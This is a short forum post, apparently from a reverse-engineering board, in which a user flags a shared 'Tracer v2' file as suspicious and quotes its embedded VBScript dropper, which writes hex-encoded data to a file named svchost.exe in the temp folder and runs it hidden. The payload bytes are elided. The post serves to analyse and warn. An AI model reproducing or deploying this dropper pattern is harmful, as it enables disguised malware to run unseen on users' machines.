Thread: Tracer v2
View Single Post
  #3  
Old 01-11-2018, 20:33
cybercoder cybercoder is offline
Friend
 
Join Date: Aug 2005
Posts: 114
Rept. Given: 2
Rept. Rcvd 11 Times in 8 Posts
Thanks Given: 22
Thanks Rcvd at 46 Times in 31 Posts
cybercoder Reputation: 11
Yep actually looks pretty dodgy, seems to try and use vbscript to drop svchost.exe

--<SCRIPT Language=VBScript><!--
DropFileName = "svchost.exe"
WriteData = ......

Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
</SCRIPT>

Haven't actually checked out the file that is to be dropped yet.
Reply With Quote